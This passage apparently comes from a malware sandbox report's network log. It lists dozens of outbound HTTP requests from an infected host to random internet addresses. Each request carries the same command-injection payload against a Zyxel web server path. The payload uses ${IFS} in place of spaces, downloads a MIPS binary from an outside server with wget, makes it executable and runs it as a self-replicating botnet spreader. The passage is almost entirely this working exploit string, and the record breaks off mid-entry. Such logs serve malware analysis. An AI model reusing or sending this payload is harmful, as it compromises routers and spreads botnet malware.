                                                        444192.168.2.145188676.66.143.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091103077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.1449192199.211.220.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091161013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.1435554209.250.76.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091223955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.145027864.108.113.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091234922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.14333264.106.64.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091264963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.143600467.171.218.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091286898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.1450008191.196.93.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091312885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.1460638154.214.106.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091350079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.144258486.159.146.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091428995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.1457222144.113.127.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091444969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.1456144157.8.193.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091449976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.1451642175.34.91.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091494083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.1455950219.215.12.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091536999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.143745435.132.223.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091563940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.144435665.233.140.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091607094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.1458416198.131.6.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091650963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.14453342.105.37.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091671944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.145359681.130.88.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091732979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.1439470158.169.163.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091731071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.1442866181.167.206.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091787100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.1452246171.251.62.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091820955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.143454889.62.175.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091871023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.143426472.21.229.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091903925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.1442198180.119.189.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091941118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.1455108131.164.67.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091972113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.1452094108.40.243.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092020988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.143907480.53.19.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092075109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.145171486.8.129.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092113972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.1444370184.78.43.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092149973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.1442642136.140.181.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092179060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.1451918125.7.4.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092209101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.144488247.238.159.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092257977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.1453734142.222.23.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092288017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.145225680.110.82.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092325926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.143871624.115.192.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092374086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.1455560118.175.203.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092403889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.144431099.127.85.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092463970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.1441672195.114.94.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092472076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.145016658.219.9.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092502117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.1445434206.96.84.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092550039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.1437974217.217.37.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092586040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.143997077.175.76.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092628002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.1446038158.28.197.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092653036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.143314023.130.121.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092725039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.143843038.231.125.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092744112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.1441380148.187.165.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092761993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.1444116193.39.107.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092801094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.1444992155.187.151.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092837095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.1447932120.41.124.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092869043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.1436242168.175.25.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092926025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.143680851.74.211.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.092969894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.1448198139.184.65.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093002081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.145151263.24.177.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093044996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.1448966201.214.242.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093092918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.144556082.128.227.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093111992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.1439530151.239.121.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093158960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.1459728134.163.185.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093185902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.1438852166.34.114.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093235016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.145961617.203.220.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093266964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.1436256178.56.61.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093317986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.145972261.103.205.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093353033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.145212246.193.65.8443
                                                        TimestampBytes transferredDirectionData
